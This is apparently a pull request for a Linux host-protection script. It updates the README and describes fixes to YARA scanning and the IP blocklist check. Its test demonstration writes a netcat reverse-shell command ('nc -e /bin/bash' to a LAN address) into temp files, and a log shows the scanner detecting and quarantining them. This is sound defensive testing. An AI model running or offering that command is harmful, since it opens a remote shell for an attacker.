### PR TITLE
Various fixes

### DIFF
--- a/README.md
+++ b/README.md
@@ -70,6 +70,7 @@ sudo ./theprotector.sh install
 
 ### Required (Standard on all Linux systems)
 - bash (4.0 or higher)
+- coreutils
 - curl or wget
 - awk, grep, sed
 - netstat or ss
@@ -157,6 +158,9 @@ sudo ./theprotector.sh json
 
 # Edit configuration
 sudo ./theprotector.sh config
+
+# Launch dashboard with custom port
+DASHBOARD_PORT="8000" ./theprotector.sh dashboard
 ```
 
 ### Automated Monitoring


### PR DESCRIPTION
- Is based on my other MR, which should be merged first: https://github.com/IHATEGIVINGAUSERNAME/theProtector/pull/12

- Closes https://github.com/IHATEGIVINGAUSERNAME/theProtector/issues/4 by allowing user to override dashboard port with `DASHBOARD_PORT` environment variable

- Fixes Yara invocation, as `yara -r` [does not support reading multiple rule files from a directory](https://github.com/VirusTotal/yara/issues/753#issuecomment-336168792), example invocation:

```
❯ echo 'nc -e /bin/bash 192.168.0.9 9999' > /tmp/reverse-shell.sh && echo 'nc -e /bin/bash 192.168.0.9 9999' > /tmp/reverse-shell-2.sh

❯ ./theprotector.sh yara
[INFO] eBPF tools not found - kernel monitoring disabled
[INFO] YARA rules initialized for advanced malware detection
[INFO] Initializing Ghost Sentinel v2.3...
[INFO] Updating threat intelligence feeds...
[INFO] File monitoring with YARA malware detection...
[CRITICAL] YARA detection: Reverse_Shell_Patterns /tmp/reverse-shell.sh
0x0:$nc_connect: nc -e /bin/bash 192.168.0.9 9999
[INFO] File quarantined with forensics: /tmp/reverse-shell.sh -> /home/heywoodlh/.ghost-sentinel/logs/quarantine/reverse-shell.sh_1753401312
[CRITICAL] YARA detection: Reverse_Shell_Patterns /tmp/reverse-shell-2.sh
0x0:$nc_connect: nc -e /bin/bash 192.168.0.9 9999
[INFO] File quarantined with forensics: /tmp/reverse-shell-2.sh -> /home/heywoodlh/.ghost-sentinel/logs/quarantine/reverse-shell-2.sh_1753401312
```

- Simplified logic for checking if IP blocklist file was populated correctly -- the original check didn't work on NixOS for some reason so I thought it suitable to reduce it.